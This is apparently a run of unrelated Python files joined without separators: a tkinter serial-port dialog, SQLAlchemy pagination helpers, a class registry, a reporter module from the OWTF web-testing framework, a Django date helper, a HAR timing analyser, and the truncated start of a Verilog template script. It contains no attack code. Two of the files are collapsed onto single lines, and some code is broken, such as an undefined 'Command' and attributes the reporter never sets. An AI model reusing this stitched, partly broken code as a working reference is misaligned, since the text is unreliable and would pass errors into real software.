        self.frame = tk.Frame(self.parent)
        self.resizable(width=False, height=False)
        self.init_classes()
        self.init_variables()
        self.init_ui()
        self.frame.pack(expand=1, fill=BOTH)

    def init_classes(self):
        # Settings wrapper used to load/store the last-used port and baud.
        self._settings = Settings()

    def init_variables(self):
        self.port_label = StringVar()
        self.port = StringVar()
        self.baud = StringVar()
        # Standard serial baud rates offered in the combo box.
        self.baud_rates = [1200, 2400, 4800, 9600, 14400, 19200, 38400, 57600, 115200, 128000 , 256000]
        # Currently attached serial ports, as reported by pyserial.
        self.ports = list(serial.tools.list_ports.comports())
        # Restore the previously saved selection.
        self.port_label.set(self._settings.GetSetting('port_label'))
        self.port.set(self._settings.GetSetting('port'))
        self.baud.set(self._settings.GetSetting('baud'))
        # NOTE(review): this expression makes self.OK the tuple
        # (False, <port string>) rather than a plain boolean, mirroring the
        # `self.OK = True,self.port.get()` in ok() below -- confirm callers
        # expect a tuple and not just False/True.
        self.OK = False ,self.port.get()
        pass

    def init_ui(self):
        # Build the static widgets: logo, labels and the two combo boxes.
        self.dir_name = os.path.dirname(os.path.realpath(__file__))
        self.img_path = os.path.join(self.dir_name, "images","serial48.png")
        logo = PhotoImage(file=self.img_path )
        self.label_logo = Label(self.frame, image=logo)
        # Keep a reference so the PhotoImage is not garbage-collected.
        self.label_logo.image = logo
        self.label_logo.grid(row=0, column=0, rowspan =2, sticky='W', padx=1, pady=4)

        self.lbl_WFM = tk.Label(self.frame, text="Device port settings", font='Tahoma 8 bold', fg = 'gray')
        self.lbl_WFM.grid(row=0, column=1, sticky='W', padx=1, pady=4)
        self.lbl_Note = tk.Label(self.frame, wraplength= 200, text="Please select port where your GPS device was connected and baud rate", fg ='darkgray')
        self.lbl_Note.grid(row=1, column=1, sticky='W', padx=1, pady=1)

        self.lbl_ports = tk.Label(self.frame, text="Serial Port:")
        self.lbl_ports.grid(row=2, column=0, sticky='W', padx=10, pady=2)
        self.cbox_ports = ttk.Combobox(self.frame, textvariable=self.port_label, state="readonly", width = 50)
        self.cbox_ports.bind('<Return>')
        self.cbox_ports['values'] =self.ports
        self.cbox_ports.grid(row=2, column=1, sticky="W", pady=3)

        self.lbl_baud = tk.Label(self.frame, text="Baudrate:")
        self.lbl_baud.grid(row=3, column=0, sticky='W', padx=10, pady=2)
        self.cbox_baud = ttk.Combobox(self.frame, textvariable=self.baud, state="readonly", width = 30)
        self.cbox_baud.bind('<Return>')
        self.cbox_baud['values'] = self.baud_rates
        #self.cbox_baud.current(2) # select index 2 (48000) by default
        self.cbox_baud.grid(row=3, column=1, sticky="W", pady=3)
        pass

    def ok(self):
        # Confirm handler: persist the chosen port/baud and close the dialog.
        # The port label looks like "COM3 - description"; keep only the name.
        sel_port = self.port_label.get().split(' ')[0].strip()
        print( sel_port)
        self._settings.SetSettings('port',sel_port)
        self._settings.SetSettings('port_label', self.port_label.get())
        self._settings.SetSettings('baud', self.baud.get())
        # NOTE(review): overriding Dialog.ok() without the event=None
        # parameter breaks the default <Return> key binding -- confirm.
        self.OK = True,self.port.get()
        self.destroy()
# NOTE: removed a stray "<filename>...<gh_stars>..." scrape artifact that was
# not valid Python and preceded this line.
from math import ceil  # BUG FIX: ceil was used below but never imported

from sqlalchemy import orm


class QueryProperty(object):
    """Descriptor that returns a session-bound query object for a model class."""

    def __init__(self, session):
        # Session factory; called on every access to build a fresh session.
        self.session = session

    def __get__(self, model, Model):
        mapper = orm.class_mapper(Model)
        if mapper:
            if not getattr(Model, 'query_class', None):
                # BUG FIX: was `MOdel.query_class` (NameError at runtime).
                Model.query_class = BaseQuery

            query_property = Model.query_class(mapper, session=self.session())
            return query_property


class BaseQuery(orm.Query):
    """Default query object used for models.

    This is a subclass of sqlalchemy.orm.query.Query and has all the
    methods of a standard query as well.
    """

    #: Page size used when paginate() is called with per_page=None.
    #: BUG FIX: was referenced below but never defined.
    DEFAULT_PER_PAGE = 20

    def paginate(self, page, per_page=20, error_out=True):
        """Return a `Pagination` instance using the already-defined query
        parameters.

        Args:
            page: 1-indexed page number.
            per_page: items per page; None falls back to DEFAULT_PER_PAGE.
            error_out: raise IndexError for out-of-range pages.

        Raises:
            IndexError: if error_out is True and the page is invalid/empty.
        """
        if error_out and page < 1:
            raise IndexError

        if per_page is None:
            per_page = self.DEFAULT_PER_PAGE

        # BUG FIX: orm.Query has no `page()` method; emulate one page of
        # results with limit/offset (the same scheme Flask-SQLAlchemy uses).
        items = self.limit(per_page).offset((page - 1) * per_page).all()

        if not items and page != 1 and error_out:
            raise IndexError

        # No need to count if we're on the first page and there were fewer
        # items than we expected.
        if page == 1 and len(items) < per_page:
            total = len(items)
        else:
            total = self.order_by(None).count()

        return Pagination(self, page, per_page, total, items)


class Pagination(object):
    """One page of query results plus navigation metadata."""

    def __init__(self, query, page, per_page, total, items):
        #: The query object that was used to create this pagination object.
        self.query = query
        #: The current page number (1-indexed).
        self.page = page
        #: The number of items to be displayed on a page.
        self.per_page = per_page
        #: BUG FIX: `total` was never stored, so every `self.total` read
        #: below raised AttributeError.  Total items matching the query.
        self.total = total
        #: The items for the current page.
        self.items = items
        if self.per_page == 0:
            self.pages = 0
        else:
            #: The total number of pages.
            self.pages = int(ceil(self.total / float(self.per_page)))
        #: The number of the previous page.
        self.prev_num = self.page - 1
        #: Whether a previous page exists.
        self.has_prev = self.page > 1
        #: The number of the next page.
        self.next_num = self.page + 1
        #: Whether a next page exists.
        self.has_next = self.page < self.pages

    def prev(self, error_out=False):
        """Return a `Pagination` object for the previous page."""
        assert self.query is not None, \
            'um objeto de `query` é necessário para esse método funcionar'
        return self.query.paginate(self.page - 1, self.per_page, error_out)

    def next(self, error_out=False):
        """Return a `Pagination` object for the next page.

        (error_out now defaults to False, matching prev(); existing callers
        that passed it positionally are unaffected.)
        """
        assert self.query is not None, \
            'um objeto de `query` é necessário para esse método funcionar'
        return self.query.paginate(self.page + 1, self.per_page, error_out)


def set_query_property(model_class, session):
    """Attach a session-bound QueryProperty to `model_class.query`."""
    model_class.query = QueryProperty(session)


class ModelBase(object):
    """Base class for a custom declarative model.

    `query_class` is the class used for `query` instances; by default a
    `BaseQuery` is used.  `query` is an instance of `query_class` and can be
    used to query the database for instances of this model.
    """
    query_class = BaseQuery
    query = None


from sqlalchemy.ext.declarative import declarative_base

Model = declarative_base(cls=ModelBase)
""" registries: classes and functions for registration <NAME> <<EMAIL>> Copyright 2021, <NAME> License: Apache-2.0 Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Contents: Library (ChainMap): registry for storing, accessing, and instancing classes and instances. """ from __future__ import annotations import abc from collections.abc import Callable, MutableMapping, Sequence import copy import dataclasses import functools import inspect from typing import Any, ClassVar, Optional, Type, Union from . import traits """ Basic Registration System """ @dataclasses.dataclass class registered(object): """ registered violates the normal python convention of naming classes in capital case because it is only designed to be used as a callable decorator, where lowercase names are the norm. Args: """ wrapped: Callable[..., Optional[Any]] defaults: dict[str, Callable[..., Optional[Any]]] = dataclasses.field( default_factory = dict) namer: Callable[[Any], str] = traits.get_name """ Initialization Methods """ def __call__( self, *args: Any, **kwargs: Any) -> Callable[..., Optional[Any]]: """Allows class to be called as a decorator. Returns: Callable[..., Optional[Any]]: callable after it has been registered. """ # Updates 'wrapped' for proper introspection and traceback. functools.update_wrapper(self, self.wrapped) # Copies key attributes and functions to wrapped item. 
self.wrapped.register = self.register self.wrapped.registry = self.__class__.registry if inspect.isclass(self.wrapped): self.wrapped.__init_subclass__ = Registrar.__init_subclass__ return self.wrapped(*args, **kwargs) """ Properties """ @property def registry(self) -> MutableMapping[str, Type[Any]]: """Returns internal 'kinds' registry with builtin python types added. Returns: MutableMapping[str, Type[Any]]: dict of str keys and values of Kind subclasses and builtin python types. """ if self.defaults: complete = copy.deepcopy(self._registry) complete.update(self.defaults) return complete else: return self._registry """ Public Methods """ @classmethod def register(cls, item: Type[Any], name: Optional[str] = None) -> None: """Adds 'item' to 'registry'. """ # The default key for storing cls is its snakecase name. key = name or cls.namer(cls) cls.registry[key] = item return @dataclasses.dataclass class Registrar(object): """Mixin which automatically registers subclasses. Args: registry (ClassVar[MutableMapping[str, Type[Any]]]): key names are str names of a subclass (snake_case by default) and values are the subclasses. Defaults to an empty dict. """ registry: ClassVar[MutableMapping[str, Type[Any]]] = {} """ Initialization Methods """ @classmethod def __init_subclass__(cls, *args: Any, **kwargs: Any): """Automatically registers subclass in 'registry'.""" # Because Registrar will often be used as a mixin, it is important to # call other base class '__init_subclass__' methods, if they exist. try: super().__init_subclass__(*args, **kwargs) # type: ignore except AttributeError: pass cls.register(item = cls) """ Public Methods """ @classmethod def register(cls, item: Type[Any], name: Optional[str] = None) -> None: """Adds 'item' to 'registry'. A separate 'register' method is included so that virtual subclasses can also be registered. Args: item (Type[Any]): a class to add to the registry. name (Optional[str]): name to use as the key when 'item' is stored in 'registry'. 
Defaults to None. If not passed, the 'get_name' method will be used to """ # if abc.ABC not in cls.__bases__: # The default key for storing cls relies on the 'get_name' method, # which usually will use the snakecase name of 'item'. key = name or traits.get_name(item = cls) cls.registry[key] = item return
""" owtf.interface.reporter ~~~~~~~~~~~~~~~~~~~~~~~ The reporter module is in charge of producing the HTML Report as well as provide plugins with common HTML Rendering functions .note:: This is being deprecated. """ import cgi from tornado.template import Loader from owtf.http.requester import requester from owtf.settings import POUTPUT_TEMPLATES_DIR class Reporter(object): def __init__(self): self.requester = None self.Init = False self.Loader = Loader(POUTPUT_TEMPLATES_DIR) self.mNumLinesToShow = 15 self.CounterList = [] self.requester = requester def TransactionTableFromIDs(self, TransactionIDs, NumLinesReq=15, NumLinesRes=15): """ Draws a table of HTTP Transactions """ # functions to get the first lines of a long string transactions = self.transaction.get_by_ids(TransactionIDs) return self.TransactionTableForTransactions(transactions) def TransactionTableForURL(self, UseCache, URL, Method=None, Data=None): transaction = self.requester.get_transaction(UseCache, URL, method=Method, data=Data) return self.TransactionTableForTransactions([transaction]) def TransactionTableForURLList(self, UseCache, URLList, Method=None, Data=None): transactions = self.requester.get_transactions(UseCache, URLList, method=Method, data=Data) return self.TransactionTableForTransactions(transactions) def TransactionTableForTransactions(self, Transactions): return self.Loader.load("transaction_table.html").generate(TransactionList=Transactions) def str(self, *args): try: return str(*args) except TypeError: return args[0] # Input is already Unicode def reset_loader(self): return self.Loader.reset() # ----------------------------------- Methods exported from plugin_helper.py --------------------------------- def cmd_table(self, command): return self.Loader.load("command_table.html").generate(Command=Command) def link_list(self, link_listName, Links): """ Wrapper to allow rendering a bunch of links -without name- as resource links with name = link """ return 
self.Loader.load("link_list.html").generate(link_listName=link_listName, Links=Links) def resource_linklist(self, ResourceListName, ResourceList): """ Draws an HTML Search box for defined Vuln Search resources """ return self.Loader.load("resource_link_list.html").generate(ResourceListName=ResourceListName, ResourceList=ResourceList) def Tabbedresource_linklist(self, ResourcesList): """ ResourceList = [ "ResourceListName", [["Name1","Resource1"],["Name2","Resource2"]] ] """ TabData = [] Resources = [] for ResourceListName, ResourceList in ResourcesList: TabID = ResourceListName.replace(' ', '_') TabData.append([ResourceListName, TabID]) Resources.append([TabID, ResourceList]) return self.Loader.load("tabbed_resource_link_list.html").generate(TabData=TabData, Resources=Resources) def ListPostProcessing(self, ResourceListName, link_list, HTMLlink_list): return self.Loader.load("list_post_processing.html").generate(ResourceListName=ResourceListName, link_list=link_list, HTMLlink_list=HTMLlink_list) def Requestlink_list(self, ResourceListName, link_list): return self.Loader.load("request_link_list.html").generate(ResourceListName=ResourceListName, link_list=link_list) def VulnerabilitySearchBox(self, SearchStr): """ Draws an HTML Search box for defined Vuln Search resources """ VulnSearchResources = self.resource.get_resources('VulnSearch') return self.Loader.load("vulnerability_search_box.html").generate(SearchStr=SearchStr, VulnSearchResources=VulnSearchResources) def SuggestedCommandBox(self, PluginOutputDir, CommandCategoryList, Header=''): """ Draws HTML tabs for a list of TabName => Resource Group (i.e. 
how to run hydra, etc) """ TitleList = [] CommandList = [] for item in CommandCategoryList: TitleList.append(item[0]) CommandList.append(self.resource.get_resources(item[1])) # TODO: Fix up the plugin return self.Loader.load("suggested_command_box.html").generate(Header=Header, TitleList=TitleList, CommandList=CommandList) def CommandDump(self, Name, CommandIntro, ModifiedCommand, RelativeFilePath, OutputIntro, TimeStr): AbsPath = self.plugin_handler.get_abs_path(RelativeFilePath) OutputLines = open(AbsPath, "r").readlines() longOutput = (len(OutputLines) > self.mNumLinesToShow) if (len(OutputLines) > self.mNumLinesToShow): OutputLines = ''.join(OutputLines[0:self.mNumLinesToShow]) else: OutputLines = ''.join(OutputLines) table_vars = { "Name": Name, "CommandIntro": CommandIntro, "ModifiedCommand": ModifiedCommand, "FilePath": RelativeFilePath, "OutputIntro": OutputIntro, "OutputLines": OutputLines, "TimeStr": TimeStr, "mNumLinesToShow": self.mNumLinesToShow, "longOutput": longOutput } return self.Loader.load("command_dump.html").generate(**table_vars) def URLsFromStr(self, TimeStr, VisitURLs, URLList, NumFound): html_content = self.Loader.load("urls_from_str.html").generate(TimeStr=TimeStr, VisitURLs=VisitURLs, NumURLs=len(URLList), NumFound=NumFound) if URLList: html_content += self.link_list("URLs Scraped", URLList) return html_content def Robots(self, NotStr, NumLines, NumAllow, NumDisallow, NumSitemap, SavePath, EntriesList, NumAddedURLs): vars = { "robots_found": NotStr, "num_lines": NumLines, "num_allow": NumAllow, "num_disallow": NumDisallow, "num_sitemap": NumSitemap, "save_path": SavePath } TestResult = self.Loader.load("robots.html").generate(**vars) # robots.txt contains some entries, show browsable list! 
:) if NumDisallow > 0 or NumAllow > 0 or NumSitemap > 0: for Display, Links in EntriesList: if Links: # Filters empty lists TestResult += self.resource_linklist(Display, Links) return TestResult def HtmlString(self, String): return String # ---------------------- Grep Plugin Outputs -------------------- # def ResponseBodyMatches(self, ResponseRegexpName): RegexpName, GrepOutputs, TransactionIDS, match_percent = self.transaction.search_by_regex_name(ResponseRegexpName, stats=True) variables = { "name": RegexpName.replace("RESPONSE_REGEXP_FOR_", "").replace('_', ' '), "matches": GrepOutputs, "transaction_ids": TransactionIDS, "match_percent": match_percent } return self.Loader.load("response_matches.html").generate(**variables) def ResponseHeaderMatches(self, HeaderRegexpName): return self.ResearchHeaders(HeaderRegexpName)[0] def ResearchHeaders(self, RegexName): regex_name, grep_outputs, transaction_ids, match_percent = self.transaction.search_by_regex_name(RegexName, stats=True) # [[unique_matches, matched_transactions, matched_percentage]] searches = self.Loader.load("header_searches.html").generate(match_percent=match_percent, matches=grep_outputs, transaction_ids=transaction_ids) return [searches, grep_outputs] def FingerprintData(self): HeaderTable, matches = self.ResearchHeaders('HEADERS_FOR_FINGERPRINT') for item in matches: # Add Vulnerability search boxes after table HeaderTable += self.VulnerabilitySearchBox(item[1]) return HeaderTable def TopTransactionsBySpeed(self, Order): transactions = self.transaction.get_top_by_speed(Order) return self.TransactionTableForTransactions(transactions) def CookieAttributeAnalysis(self, CookieValueList, Header2TransacDict): vars = { "Cookies": [{ "Name": Cookie.split('=')[0], "Link": Header2TransacDict[self.config.get('HEADERS_FOR_COOKIES').lower() + Cookie], "Attribs": Cookie.replace(Cookie.split('=')[0] + "=", "").replace("; ", ";").split(";"), } for Cookie in CookieValueList], } Table = 
self.Render.CreateTable({'class': 'report_intro'}) SetCookie = self.config.get('HEADERS_FOR_COOKIES').lower() PossibleCookieAttributes = self.config.get('COOKIE_ATTRIBUTES').split(',') for Cookie in CookieValueList: CookieName = Cookie.split('=')[0] CookieLink = self.Render.DrawButtonLink(cgi.escape(CookieName), Header2TransacDict[SetCookie + Cookie]) CookieAttribs = Cookie.replace(CookieName + "=", "").replace("; ", ";").split(";") Table.CreateCustomRow('<tr><th colspan="2">Cookie: %s</th></tr>' % CookieLink) Table.CreateRow(['Attribute', 'Value'], True) NotFoundStr = "<b>Not Found</b>" if CookieAttribs[0]: CookieValue = CookieAttribs[0] else: CookieValue = NotFoundStr Table.CreateRow(['Value', CookieValue]) for Attrib in PossibleCookieAttributes: DisplayAttribute = NotFoundStr for PresentAttrib in CookieAttribs: # Avoid false positives due to cookie contents if PresentAttrib.lower().startswith(Attrib.lower()): DisplayAttribute = PresentAttrib break Table.CreateRow([Attrib, DisplayAttribute]) if Table.GetNumRows() == 0: return "" # No Attributes found return "<h3>Cookie Attribute Analysis</h3>%s" % Table.Render() reporter = Reporter()
<gh_stars>0
# -*- coding: utf-8 -*-

import calendar, logging, pprint
from django.conf import settings as project_settings
from django.core.cache import cache
from django.core.urlresolvers import reverse
from tech_services_reports.models import Accession, CatEdit

log = logging.getLogger("webapp")


class DateMaker(object):
    """ Prepares accession and catalog dates. """

    def make_context( self, scheme, host ):
        """ Builds context for index view.
            Called by views.index() """
        context = {
            'STATIC_URL': project_settings.STATIC_URL,
            'acc_months': self.get_acc_months( scheme, host ),
            'acc_years': self.get_acc_years( scheme, host ),
            'cat_months': self.get_cat_months( scheme, host ),
            'cat_years': self.get_cat_years( scheme, host ),
            'custom_report_url': reverse('custom_report_url')
            }
        context = self.add_admin_urls( context )
        log.debug( 'context,```{}```'.format( pprint.pformat(context) ) )
        return context

    def get_acc_months( self, scheme, host ):
        """ Returns accession monthly date info (one dict per month with a
            link to that month's accessions page).
            Results of the underlying query are cached for one day.
            Called by make_context() """
        acc_months = cache.get( 'acc_months_cached' )
        acc_month_lst = []
        if acc_months is None:
            acc_months = Accession.objects.dates('created', 'month', order='DESC')  # grabs list of accession date-objects, one-per-month
            cache.set( 'acc_months_cached', acc_months, 60*60*24 )  # 1 day
        for date_obj in acc_months:
            # scheme/host kwargs are unused now that links are relative.
            # link = '{sch}://{hst}{url}{yr}/{mo}/'.format( sch=scheme, hst=host, url=reverse('accessions'), yr=date_obj.year, mo=date_obj.month )
            link = '{url}{yr}/{mo}/'.format( sch=scheme, hst=host, url=reverse('accessions'), yr=date_obj.year, mo=date_obj.month )
            acc_month_lst.append( {
                'month': date_obj.month,
                'month_name': calendar.month_name[date_obj.month],
                'year': date_obj.year,
                'link': link } )
        # log.debug( 'type(acc_months), `{typ}`; acc_months, ```{val}```'.format( typ=type(acc_months), val=acc_months) )
        log.debug( 'acc_month_lst, ```{}```'.format(pprint.pformat(acc_month_lst)) )
        return acc_month_lst

    def get_cat_months( self, scheme, host ):
        """ Returns catalog monthly date info, same shape as get_acc_months().
            Called by make_context() """
        cat_months = cache.get( 'cat_months_cached' )
        cat_month_lst = []
        if cat_months is None:
            cat_months = CatEdit.objects.dates('edit_date', 'month', order='DESC')  # grabs list of cataloging date-objects, one-per-month
            cache.set( 'cat_months_cached', cat_months, 60*60*24 )  # 1 day
        for date_obj in cat_months:
            # link = '{sch}://{hst}{url}{yr}/{mo}/'.format( sch=scheme, hst=host, url=reverse('cataloging'), yr=date_obj.year, mo=date_obj.month )
            link = '{url}{yr}/{mo}/'.format( sch=scheme, hst=host, url=reverse('cataloging'), yr=date_obj.year, mo=date_obj.month )
            cat_month_lst.append( {
                'month': date_obj.month,
                'month_name': calendar.month_name[date_obj.month],
                'year': date_obj.year,
                'link': link } )
        log.debug( 'cat_month_lst, ```{}```'.format(pprint.pformat(cat_month_lst)) )
        return cat_month_lst

    def get_acc_years( self, scheme, host ):
        """ Returns accession year date info (one dict per year with a link).
            Called by make_context() """
        acc_years = cache.get( 'acc_years_cached' )
        acc_years_lst = []
        if acc_years is None:
            acc_years = Accession.objects.dates('created', 'year', order='DESC')  # grabs list of accession date-objects, one-per-year
            cache.set( 'acc_years_cached', acc_years, 60*60*24 )
        for date_obj in acc_years:
            # link = '{sch}://{hst}{url}{yr}/'.format( sch=scheme, hst=host, url=reverse('accessions'), yr=date_obj.year )
            link = '{url}{yr}/'.format( sch=scheme, hst=host, url=reverse('accessions'), yr=date_obj.year )
            acc_years_lst.append( {'year': date_obj.year, 'link': link} )
        log.debug( 'acc_years_lst, ```{}```'.format(pprint.pformat(acc_years_lst)) )
        return acc_years_lst

    def get_cat_years( self, scheme, host ):
        """ Returns catalog year dates (one dict per year with a link).
            Called by views.index() """
        cat_years = cache.get( 'cat_years_cached' )
        cat_years_lst = []
        if cat_years is None:
            cat_years = CatEdit.objects.dates('edit_date', 'year', order='DESC')  # grabs list of cataloging date-objects, one-per-year
            cache.set( 'cat_years_cached', cat_years, 60*60*24 )
        for date_obj in cat_years:
            # link = '{sch}://{hst}{url}{yr}/'.format( sch=scheme, hst=host, url=reverse('cataloging'), yr=date_obj.year )
            link = '{url}{yr}/'.format( sch=scheme, hst=host, url=reverse('cataloging'), yr=date_obj.year )
            cat_years_lst.append( {'year': date_obj.year, 'link': link} )
        log.debug( 'cat_years_lst, ```{}```'.format(pprint.pformat(cat_years_lst)) )
        return cat_years_lst

    def add_admin_urls( self, context ):
        """ Adds admin edit urls to context.
            Called by make_context() """
        context['admin_edit_summary_accession_data_url'] = reverse('admin:tech_services_reports_summaryaccession_changelist')
        context['admin_edit_summary_cat_data_url'] = reverse('admin:tech_services_reports_summarycatedit_changelist')
        context['admin_edit_harvested_accession_data_url'] = reverse('admin:tech_services_reports_accession_changelist')
        context['admin_edit_harvested_cat_data_url'] = reverse('admin:tech_services_reports_catedit_changelist')
        return context

    ## end class DateMaker()
from har_models import har_data_from_dict, Entry
from typing import Set, List, Tuple, Dict
from datetime import datetime
import json
import logging
import copy

logging.basicConfig(
    level=logging.DEBUG,
    format="[%(asctime)s] %(levelname)-12s|process:%(process)-5s|thread:%(thread)-5s|funcName:%(funcName)s|message:%(message)s",
    handlers=[
        # logging.FileHandler('fileName.log'),
        logging.StreamHandler()
    ])

# Substrings that mark a response MIME type as a "static" resource.
STATIC_TYPES = ['javascript', 'woff', 'css', 'image', 'video', 'audio']
# NOTE: name kept for backward compatibility ("MINUTE" is misspelled).
MILLISEC_IN_MUNUTE = 60000


def get_mime_types(entries: List[Entry]) -> Set[str]:
    """Return the set of distinct response MIME types seen in *entries*."""
    all_mime_types = [entry.response.content.mime_type for entry in entries]
    logging.debug(f'all_mime_types {type(all_mime_types)} = {all_mime_types}')
    return set(all_mime_types)


def get_type_lists(mime_types: List[str]) -> List[str]:
    """Filter *mime_types* down to those that look like static resources.

    A MIME type is considered static when any of the STATIC_TYPES
    substrings occurs in it (e.g. 'text/css', 'image/png').
    """
    static_types = []
    for mime_type in mime_types:
        is_static = any(stype in mime_type for stype in STATIC_TYPES)
        logging.debug(f'mime_type {type(mime_type)} = {mime_type}')
        logging.debug(f'is_static {type(is_static)} = {is_static}')
        if is_static:
            static_types.append(mime_type)
    return static_types


def _group_key(entry: Entry) -> str:
    """Normalize an entry's HAR comment into a group key.

    Entries with an empty comment are collected under 'non-comment'.
    """
    return 'non-comment' if entry.comment == '' else entry.comment


def grouping_by_comment(entries: List[Entry], static_mime_types: List[str]):
    """Group HAR entries by their comment field.

    Returns a dict of the form::

        {'comments': {comment: group_number},
         'entries':  {comment: {'group_number': int,
                                'static': [Entry, ...],
                                'non-static': [Entry, ...]}}}

    Group numbers are assigned in order of first appearance, starting at 1.
    """
    comments: Dict[str, int] = {}
    group_number = 1
    for entry in entries:
        key = _group_key(entry)
        if key not in comments:
            comments[key] = group_number
            group_number += 1
    logging.debug(f'comments {type(comments)} = {comments}')

    grouped_entries = {'entries': {}, 'comments': comments}
    for comment, number in comments.items():
        grouped_entries['entries'][comment] = {
            'static': [],
            'non-static': [],
            'group_number': number,
        }
    for entry in entries:
        key = _group_key(entry)
        if entry.response.content.mime_type in static_mime_types:
            grouped_entries['entries'][key]['static'].append(entry)
        else:
            grouped_entries['entries'][key]['non-static'].append(entry)
    return grouped_entries


def set_types(entries, mime_types, static_mime_types):
    """Attach the observed MIME-type collections to the entries dict."""
    entries['mime_types'] = mime_types
    entries['static_mime_types'] = static_mime_types
    return entries


def count_requests(entries_data):
    """Add per-group and whole-session request counts to *entries_data*."""
    summary_static = 0
    summary_non_static = 0
    summary_full = 0
    for group in entries_data['entries'].values():
        group['group_static_requests_count'] = len(group['static'])
        group['group_non_static_requests_count'] = len(group['non-static'])
        group['group_full_requests_count'] = (
            group['group_static_requests_count']
            + group['group_non_static_requests_count'])
        summary_static += group['group_static_requests_count']
        summary_non_static += group['group_non_static_requests_count']
        summary_full += group['group_full_requests_count']
    entries_data['summary_static_requests_count'] = summary_static
    entries_data['summary_non_static_requests_count'] = summary_non_static
    entries_data['summary_full_requests_count'] = summary_full
    return entries_data


def _scan_entries(entries, start_epoch, end_epoch):
    """Fold *entries* into (start_epoch, end_epoch, total_millisec).

    start/end are unix timestamps of the earliest/latest request starts;
    a value of 0 means "not seen yet" and is replaced by the first entry,
    matching the original sentinel convention.
    """
    total_millisec = 0
    for entry in entries:
        current_entry: Entry = entry
        ts = current_entry.started_date_time.timestamp()
        if start_epoch == 0 or ts < start_epoch:
            start_epoch = ts
        if end_epoch == 0 or ts > end_epoch:
            end_epoch = ts
        total_millisec += current_entry.time
    return start_epoch, end_epoch, total_millisec


def set_times_in_entries(entries_data):
    """Compute per-group and session-wide timing/throughput metrics.

    Think time per group = wall-clock span of the group minus the sum of
    request durations, clamped at zero (requests may overlap).
    NOTE(review): throughput divisions assume the corresponding totals are
    non-zero; a HAR with no timed entries would raise ZeroDivisionError,
    unchanged from the original behavior.
    """
    for group in entries_data['entries'].values():
        start, end, static_ms = _scan_entries(group['static'], 0, 0)
        start, end, non_static_ms = _scan_entries(group['non-static'], start, end)
        total_ms = static_ms + non_static_ms

        group['group_total_time_millisec'] = total_ms
        group['group_static_time_millisec'] = static_ms
        group['group_non_static_time_millisec'] = non_static_ms
        group['group_start_datetime'] = start
        group['group_end_datetime'] = end
        group['group_time_difference_millisec'] = (end - start) * 1000
        think_ms = group['group_time_difference_millisec'] - total_ms
        group['group_think_time_millisec'] = think_ms if think_ms > 0 else 0

    total_time_millisec = 0
    static_time_millisec = 0
    non_static_time_millisec = 0
    total_time_with_think_time = 0
    for group in entries_data['entries'].values():
        total_time_millisec += group['group_total_time_millisec']
        static_time_millisec += group['group_static_time_millisec']
        non_static_time_millisec += group['group_non_static_time_millisec']
        total_time_with_think_time += (group['group_total_time_millisec']
                                       + group['group_think_time_millisec'])

    entries_data['total_time_millisec'] = total_time_millisec
    entries_data['static_time_millisec'] = static_time_millisec
    entries_data['non_static_time_millisec'] = non_static_time_millisec
    entries_data['total_time_with_think_time'] = total_time_with_think_time

    entries_data['minutes_on_one_iteration_with_think_time'] = \
        total_time_with_think_time / MILLISEC_IN_MUNUTE
    entries_data['throughput_in_minute_with_think_time'] = \
        MILLISEC_IN_MUNUTE / total_time_with_think_time
    entries_data['minutes_on_one_iteration_with_out_think_time'] = \
        total_time_millisec / MILLISEC_IN_MUNUTE
    entries_data['throughput_in_minute_with_out_think_time'] = \
        MILLISEC_IN_MUNUTE / total_time_millisec
    entries_data['minutes_on_one_iteration_non_static'] = \
        non_static_time_millisec / MILLISEC_IN_MUNUTE
    entries_data['throughput_in_minute_non_static'] = \
        MILLISEC_IN_MUNUTE / non_static_time_millisec
    return entries_data


def write_entries_data(entries_data: dict, filename: str):
    """Write a per-group CSV summary and a JSON totals file.

    Output paths are derived from *filename* (the input .har name):
    '<filename>-groups-summary.csv' and '<filename>-results.json'.
    FIX: *filename* was previously unused (the f-strings had no
    placeholders), and the CSV header named the wrong columns for the
    per-row data; both are corrected here.
    """
    with open(f'{filename}-groups-summary.csv', mode='w', encoding='UTF-8') as file:
        file.write('group_number,entry_group_name,group_total_time_millisec,'
                   'group_static_time_millisec,group_non_static_time_millisec,'
                   'group_start_datetime,group_end_datetime,'
                   'group_time_difference_millisec,group_think_time_millisec,'
                   'group_static_requests_count,group_non_static_requests_count,'
                   'group_full_requests_count\n')
        # Synthetic "summary" row: group number 0, no start/end/span.
        file.write(
            f"0,summary,{entries_data['total_time_millisec']},"
            f"{entries_data['static_time_millisec']},"
            f"{entries_data['non_static_time_millisec']},0,0,0,"
            f"{entries_data['total_time_with_think_time']},"
            f"{entries_data['summary_static_requests_count']},"
            f"{entries_data['summary_non_static_requests_count']},"
            f"{entries_data['summary_full_requests_count']}\n")
        for entry_group_name, group in entries_data['entries'].items():
            row = [
                group['group_number'],
                entry_group_name,
                group['group_total_time_millisec'],
                group['group_static_time_millisec'],
                group['group_non_static_time_millisec'],
                group['group_start_datetime'],
                group['group_end_datetime'],
                group['group_time_difference_millisec'],
                group['group_think_time_millisec'],
                group['group_static_requests_count'],
                group['group_non_static_requests_count'],
                group['group_full_requests_count'],
            ]
            file.write(','.join(str(value) for value in row) + '\n')

    with open(f'{filename}-results.json', mode='w', encoding='UTF-8') as file:
        entries_copy = copy.deepcopy(entries_data)
        # Drop bulky / non-JSON-serializable keys (mime_types is a set,
        # entries holds Entry objects); only scalar totals remain.
        del entries_copy['comments']
        del entries_copy['entries']
        del entries_copy['mime_types']
        file.write(json.dumps(entries_copy))


def main():
    """Load a HAR file, group its entries by comment, and write reports."""
    filename = 'test5.har'
    with open(filename, encoding='utf-8-sig', errors='ignore') as file:
        json_data = json.load(file, strict=False)
    har_data = har_data_from_dict(json_data)
    entries = har_data.log.entries
    mime_types = get_mime_types(entries)
    static_mime_types = get_type_lists(mime_types)
    entries_by_comment = grouping_by_comment(entries, static_mime_types)
    entries_data = set_types(
        entries_by_comment, mime_types, static_mime_types)
    entries_data = count_requests(entries_data)
    entries_data = set_times_in_entries(entries_data)
    write_entries_data(entries_data, filename)


if __name__ == "__main__":
    main()
import sys
import os
import re
import time
import logging
import string

from NullHandler import NullHandler
import help
from vlogTemplate import vlogTemplate
from incTemplate import incTemplate

# NOTE(review): this module uses a Python 2 print statement (see
